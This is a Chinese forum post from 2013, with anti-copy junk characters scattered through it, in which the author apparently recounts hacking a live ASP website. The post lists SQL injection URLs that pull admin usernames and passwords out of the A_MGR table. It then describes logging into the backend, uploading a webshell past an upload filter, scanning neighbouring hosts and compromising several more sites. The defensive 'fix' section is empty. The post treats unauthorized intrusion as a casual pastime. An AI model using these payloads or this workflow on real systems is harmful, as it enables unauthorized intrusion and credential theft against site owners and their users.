发现一个注入点
# C& L! s; L5 Dhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
* N$ q- v" ^5 U, U) r! _2 e {) X1 T9 G% m, y% ?4 o
习惯性的加’having1=1--
6 k$ M( t# w- m- i6 ^% O
" H, L# \, `2 c# ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—2 P6 q) E) [# ~2 m' R( j3 g
5 d7 s; W. H$ I4 |0
: @1 m- Y$ _) T7 \8 v
2 s/ R$ {3 p0 m爆出Diary_A.dl_Title(这时候很激动啊). k Y5 g! o1 }
! M7 [3 @- |& K& `( s
那么继续
3 p7 [. j' p: o0 yhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—) @/ a: L- l" o! d
3 f/ o) r# | U. p- V继续,一直爆下去
0 R# l9 U( S, H, `# A+ ]+ o! z4 b1 @4 h0 @! ], ~' Y
爆到几个字段和表段 但是没找到需要的管理用户的字段/ h& H. {+ o+ O
( t7 V# V- `5 k: K5 }4 ~蛋疼了 怎么办 然后去后台登陆页看源码
! ?6 e" j k. K) }
# v" j& e6 [3 Y* r7 [# b' Q0 Z7 Z- t! a6 ~
' b& ?7 \; \3 f; Y. R
Input name= “ADUID”
7 ~! n- r) w) t M' @$ \8 D5 w. M1 c! r- OInput name= “ADPWD”8 M* x1 g! J' @: R
; w; X3 v2 _# u# t3 }1 J很幸运 找到了字段那就继续
; d" i3 M3 P2 O* [+ t8 X8 P找到之后开始爆用户
" ~0 w( h0 C$ r+ Ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—7 f7 o$ d/ k% [# s3 W
爆密码( m9 z! f1 y( A& N9 {
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—) \/ |% i1 |, X* E& l( {
测试了下 这个注入点只能爆到文章哪里的表
" z7 ^5 E) F7 P: V" c) M, c: B* n, U6 v; V! G" f
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了# o& h* B3 w" q9 C1 N
6 }) P7 j6 ^1 {/ X% `
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
& f$ ]" S( Q. w& V* |4 | Q% Y8 C$ I T- ~2 K1 V6 k! L7 U
473
7 i" b7 V; Y! _
7 j+ U7 O& i# P3 C" Z进后台' I3 f, \0 N/ P
; g( c1 z! q& w/ b8 ^9 }7 J8 K
$ Q+ Y; d: J5 a8 t+ R发现几个上传点 有的地方不能上传 而且防止恶意代码4 D0 k5 s4 N8 O# o" H
9 b/ z& r* B# k- K% I没办法 各种百度各种找大牛 找到一只好像可以突破的马) d- V% L: q8 k& o' i- L5 A
7 n" X0 n+ `6 W/ a& @
5 F, H9 c# n- e9 F% |, H0 {在系统管理那里直接上传 不过没有显示地址
$ b- S4 a- W( U7 I* m( @1 I
( O5 X7 ~3 q& K1 b6 z$ E' B% q再上传一次 抓包 搞定OK: f- s3 ?0 Y: f K5 b) k
0 x' f5 c0 O1 z$ [0 h* W0 `6 g7 y2 e
# w# X3 W& q2 H. Y9 [8 P' @+ P' s. g( D% b
7 |4 R. u2 W: w, h$ r0 h9 [# x4722 d7 [9 d0 j* P8 m3 Z; b1 l/ D
& }. |1 p9 Q* K1 c) N0 S& y3 w晚上不行了 去睡觉。。。
+ ]5 A: ^+ X; b- Q7 a! A7 T第二天刚起床 闲的没事做继续日站吧 . m3 k3 M( @6 c0 g
% w: v9 Q& G& S" l. D6 f找个站 就把这个站的旁c扫了下
2 w- P$ t% C* ?" k
* F. }3 K: f$ g6 D发现c段也有一个购物站 ,然后还和这个站的模板差不多7 l) V9 [( R: d4 O
9 P% N5 v( ~ v9 ~0 r5 f8 K; @
就找到会员登录口测试# @5 Z8 x3 T- x4 m7 p
, ?7 ]1 Y5 ?& s5 y3 g
'and (select top 1 MGR_UID from A_MGR)>0—& e5 u' F9 F# j- a; ^
果断爆到了 这时候我很激动 通杀/ I, ]; ^1 t, H' L9 [" q4 h
U& u6 D; D3 E: c6 _* G: C再次翻c段
" V# C, _4 ~) ^) w
. W! w2 |; e8 p* L翻出几个站 都成功拿下& H- X3 d! y1 j; V, O7 f9 t$ W
7 o; d" h8 ]& B7 K; C- Y- z; {* D
" ^, l( V; r) `8 Y0 o- z& c1 j" T
$ n3 U7 L/ d% e4 |
修复方案:. Y g* p P: k- ]5 Y7 E+ a
他们比我专业
4 S+ n, Q! [9 g, F2 S- I2 M- L' N9 }* a1 G# M m# D$ S
i- V3 M1 P3 g
1 ^6 D' j# i% } H |
发表于 2013-4-4 17:40:38
收藏
支持
反对